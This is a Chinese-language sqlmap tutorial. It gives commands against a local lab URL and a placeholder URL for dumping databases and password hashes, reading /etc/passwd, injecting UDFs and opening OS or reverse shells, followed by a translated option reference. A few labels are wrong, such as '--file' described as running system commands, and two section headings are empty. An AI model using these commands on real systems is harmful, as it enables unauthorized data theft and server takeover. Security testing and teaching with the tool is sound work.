sqlmap使用教程
1.SQLMAP介绍
Sqlmap是一个自动化的sql注入工具,其主要功能是扫描、发现并利用给定url的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、Oracle、postgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、sybase和SAP MaxDB。
Sqlmap采用了以下5中独特的SQL注入技术。
- 基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
- 基于时间的盲注,即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已执行(即页面返回时间是否增加)来判断。
- 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中。
- 联合查询注入,在可以使用union的情况下的注入。
- 堆查询注入,可以同时执行多条语句时的注入。
SQLmap的强大功能包括数据库指纹识别、数据库枚举、数据库提取、访问目标文件系统,并在获取完全的操作权限时实行任意命令。Sqlmap的功能强大到让人惊叹,当常规的注入工具不能利用SQL注入漏洞进行注入时,使用sqlmap会有意想不到的效果。
2.SQLMAP基础信息
获取当前用户名称
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --current-user
获取当前数据库名称
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --current-db
获取表名
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security --tables
获取字段
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users --columns
获取字段内容
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users -C id --dump
3.SQLMAP进阶信息内容
执行测试等级
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --level 2
指定数据库类型
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --dbms "Mysql"
列数据库用户
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --users
列数据库
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --dbs
数据库用户密码
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --passwords
列出指定用户数据库密码
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --passwords -U root
查看权限
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --privileges
查看指定用户权限
p>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --privileges -U root
是否是数据库管理员
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --is-dba
枚举数据库用户角色
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --roles
导入用户自定义函数(获取系统权限!)
sqlmap/sqlmap.py -u "http://url/news?id=1" --udf-inject
cookie注入
python sqlmap/sqlmap.py -u "http://url/news?id=1" --cookie "COOKIE_VALUE"
获取banner信息
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -b
post注入
python sqlmap/sqlmap.py -u "http://url/news?id=1" --data "id=3"
指纹判别数据库类型
>python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -f
代理注入
python sqlmap/sqlmap.py -u "http://url/news?id=1" --proxy"http://127.0.0.1:8118"
指定关键词
python sqlmap/sqlmap.py -u "http://url/news?id=1"--string"STRING_ON_TRUE_PAGE"
执行系统命令
python sqlmap/sqlmap.py -u "http://url/news?id=1" --file /etc/passwd
统交互shell
python sqlmap/sqlmap.py -u "http://url/news?id=1" --os-shell
反弹shell
python sqlmap/sqlmap.py -u "http://url/news?id=1" --os-pwn
读取win系统注册表
python sqlmap/sqlmap.py -u "http://url/news?id=1" --reg-read
保存进度
python sqlmap/sqlmap.py -u "http://url/news?id=1" --dbs-o "sqlmap.log"
恢复已保存进度
python sqlmap/sqlmap.py -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume
3.SQLMAP绕过WAF
4.SQLMAP提权
sqlmap参数详解
选项:
-h, --help 显示基本帮助信息
-hh
显示高级帮助信息
--version 显示程序版本号
-v VERBOSE 赘言级别:0-6(默认 1)
目标:
-d DIRECT 直接连接到数据库
-u URL, --url=URL 目标 URL(e.g. "www.target.com/vuln.php?id=1")
-l LOGFILE 从 Burp 或 WebScarab 日志中解析目标
-m BULKFILE
在给定的文本文件中读取多个扫描目标
-g GOOGLEDORK 将 Google dork 结果作为目标 URL
-r REQUESTFILE 从文件中读取 HTTP 请求
-c CONFIGFILE 从 INI 配置文件中读取配置选项
请求:
--data=DATA 通过 POST 方法提交的数据字符串--param-del=PDEL 用于分割参数值的字符
--cookie=COOKIE HTTP Cookie 头
--cookie-del=CDEL 用于分割 cookie 值的字符
--load-cookies=L.. 包含 cookies 的 Netscape/wget 格式文件
--drop-set-cookie 忽略响应中的 Set-Cookie 头
--user-agent=AGENT
HTTP User-Agent 头
--random-agent 使用随机选择的 HTTP User-Agent 头
--host=HOST HTTP Host 头
--referer=REFERER HTTP Referer 头
--headers=HEADERS Extra 头(e.g. "Accept-Language: fr\nETag: 123")
--auth-type=AUTH.. HTTP 认证方式(Basic, Digest, NTLM 或 PKI)
--auth-cred=AUTH.. HTTP 认证证书(name:password)
--auth-private=A.. HTTP 认证 PEM 私钥文件
--proxy=PROXY 使用代理连接目标 URL
--proxy-cred=PRO.. 代理认证证书(name:password)
--proxy-file=PRO.. 从文件读取代理列表
--ignore-proxy 接受系统默认代理设置
--tor 使用 Tor 匿名网络
--tor-port=TORPORT 设置默认以外的 Tor 代理端口
--tor-type=TORTYPE 设置 Tor 代理方式(HTTP(默认), SOCKS4 或
SOCKS5)
--check-tor 检查 Tor 是否正确使用--delay=DELAY 每个 HTTP 请求之间延迟的秒数
--timeout=TIMEOUT 认定连接超时的秒数(默认 30)
--retries=RETRIES 超时重试的次数(默认 3)
--randomize=RPARAM 随机改变给定参数的值
--safe-url=SAFURL 设置一个安全链接供系统经常访问
--safe-freq=SAFREQ 设置一个安全连接供系统在两次测试之间访问
--skip-urlencode 不对攻击载荷数据进行 URL 编码
--force-ssl
强制使用 SSL/HTTPS
--hpp 使用 HTTP 参数污染
--eval=EVALCODE 供提交请求之前评估参数的 Python 代码(e.g.
"import hashlib;id2=hashlib.md5(id).hexdigest()")
优化:
-o 开启所有优化开关
--predict-output 预测常见的查询输出
--keep-alive 使用持久的 HTTP(s)连接
--null-connection 检索 HTTP 响应长度不实际的页面
--threads=THREADS 并发 HTTP(s)请求的最大数量(默认 1)
注入:
-p TESTPARAMETER 测试参数
--skip=SKIP
跳过对给定参数的测试
--dbms=DBMS
在这里强制指定后端 DBMS--dbms-cred=DBMS.. DBMS 认证证书(user:password)
--os=OS
在这里强制后端 DBMS 操作系统
--invalid-bignum 使用大数字无效化值
--invalid-logical 使用逻辑运算无效化值
--invalid-string 使用随机字符串无效化值
--no-cast 关闭攻击载荷铸造机制
--no-escape 关闭字符串逃逸机制
--prefix=PREFIX 注入攻击载荷前缀字符串
--suffix=SUFFIX 注入攻击载荷后缀字符串
--tamper=TAMPER
使用给定的脚本篡改注入数据
检测:
--level=LEVEL 执行测试的等级(1-5, 默认 1)
--risk=RISK 执行测试的风险(0-3, 默认 1)
--string=STRING 查询被评估为 True 时的匹配字符串
--not-string=NOT.. 查询被评估为 False 时的匹配字符串
--regexp=REGEXP 查询被评估为 True 时的正则表达式
--code=CODE 查询被评估为 True 时的 HTTP 代码
--text-only 仅基于文本内容比较网页
--titles 仅基于标题比较网页
技术:
--technique=TECH 使用的 SQL 注入技术(默认使用所有技术)--time-sec=TIMESEC DBMS 响应的延迟秒数(默认 5)
--union-cols=UCOLS UNION 查询注入测试字段的范围
--union-char=UCHAR 暴破字段数量使用的字符
--union-from=UFROM UNION 查询注入 FROM 部分使用的数据表
--dns-domain=DNS.. DNS 溢出攻击所使用的域名
--second-order=S.. 二阶响应页面 URL
指纹:
-f, --fingerprint 检查 DBMS 版本指纹
枚举:
-a, --all 检索一切
-b, --banner 检索 DBMS banner 信息
--current-user 检索 DBMS 当前用户
--current-db 检索 DBMS 当前数据库
--hostname
检索 DBMS 服务器主机名
--is-dba 检测当前用户是否是 DBA
--users
枚举 DBMS 用户名
--passwords
枚举 DBMS 用户密码哈希
--privileges 枚举 DBMS 用户权限
--roles
枚举 DBMS 用户角色
--dbs 枚举 DBMS 数据库
--tables 枚举 DBMS 数据库表--columns 枚举 DBMS 数据库表字段
--schema 枚举 DBMS 架构
--count
检索数据表中的条目数
--dump 转储 DBMS 数据库表中的条目
--dump-all 转储所有 DBMS 数据库表中的条目
--search 搜索字段名, 表名和(或)库名
--comments 检索 DBMS 注释
-D DB DBMS 数据库
-T TBL DBMS 数据库表
-C COL DBMS 数据库表字段
-X EXCLUDECOL 不枚举 DBMS 数据库表字段
-U USER DBMS 用户
--exclude-sysdbs 枚举数据库表时排除 DBMS 系统库
--where=DUMPWHERE 转储数据表时使用 WHERE 条件
--start=LIMITSTART 第一个查询的输出项检索
--stop=LIMITSTOP 最后一个查询的输出项检索
--first=FIRSTCHAR 第一个查询的输出字的字符检索
--last=LASTCHAR 最后一个查询的输出字的字符检索
--sql-query=QUERY 要执行的 SQL 语句
--sql-shell
返回交互式的 SQL shell
--sql-file=SQLFILE 从给定的文件执行 SQL 语句强制暴破:
--common-tables 检查是否存在常见表
--common-columns 检查是否存在常见字段
用户定义函数注入:
--udf-inject 注入用户自定义函数
--shared-lib=SHLIB 共享库的本地路径
文件系统访问:
--file-read=RFILE 从后端 DBMS 文件系统读取文件
--file-write=WFILE 向后端 DBMS 文件系统写入本地文件
--file-dest=DFILE 向后端 DBMS 文件系统写入文件的绝对路径
操作系统访问:
--os-cmd=OSCMD
执行操作系统命令
--os-shell
返回交互式的操作系统 shell
--os-pwn 返回 OOB shell, meterpreter 或 VNC
--os-smbrelay 一键返回 OOB shell, meterpreter 或 VNC
--os-bof 存储过程缓冲区溢出利用
--priv-esc 数据库进程用户权限提升
--msf-path=MSFPATH 已安装的 Metasploit Framework 本地路径
--tmp-path=TMPPATH 远程临时文件目录的绝对路径
Windows 注册表访问:--reg-read 读取一个 Windows 注册表键值
--reg-add 写入一个 Windows 注册表键值
--reg-del 删除一个 Windows 注册表键值
--reg-key=REGKEY Windows 注册表键
--reg-value=REGVAL Windows 注册表键值
--reg-data=REGDATA Windows 注册表键值数据
--reg-type=REGTYPE Windows 注册表键值类型
常规:
-s SESSIONFILE 从存储(.sqlite)文件中读取会话
-t TRAFFICFILE 记录所有 HTTP 流量为一个文本文件
--batch
从不询问用户输入, 使用默认行为
--charset=CHARSET 强制数据检索使用的字符编码
--crawl=CRAWLDEPTH 从目标 URL 抓取起始网页
--csv-del=CSVDEL CSV 输出中使用的定界符(默认",")
--dump-format=DU.. 转储数据的格式(CSV(默认), 可以设置为 HTML
或 SQLITE)
--eta 显示每个输出的预计到达时间
--flush-session 刷新当前目标的会话文件
--forms
分析并测试目标 URL 中的表单
--fresh-queries 忽略在会话文件中存储的查询结果
--hex 对数据检索使用 DBMS 的 hex 函数
--output-dir=OUT.. 自定义输出目录路径--parse-errors 从响应中分析并显示 DBMS 错误消息
--pivot-column=P.. 透视字段
--save 保存选项到 INI 配置文件
--scope=SCOPE 用正则表达式从所提供的代理日志过滤目标
--test-filter=TE.. 通过攻击载荷和(或)标题选择测试(e.g. ROW)
--update 更新 sqlmap
杂项:
-z MNEMONICS 使用短记忆法(e.g. "flu,bat,ban,tec=EU")
--alert=ALERT 当找到 SQL 注入时运行操作系统命令
--answers=ANSWERS 设置问题的答案(e.g. "quit=N,follow=N")
--beep 当找到 SQL 注入时发出蜂鸣
--check-waf 启发式检查 WAF/IPS/IDS 保护
--cleanup 从 sqlmap 具体 UDF 和表清理 DBMS
--dependencies 检查是否缺少(非核心)的 sqlmap 的依赖
--disable-coloring 禁用控制台输出着色
--gpage=GOOGLEPAGE 从指定页码使用 Google dork 结果
--identify-waf 使测试通过 WAF/IPS/IDS 保护
--mobile 通过 HTTP User-Agent 头模拟智能手机
--page-rank 为 Google dork 结果显示网页排名(PR)
--purge-output 从输出目录中安全删除所有内容
--smart 仅通过积极的启发式进行测试
--wizard 用于初级用户的简单向导接口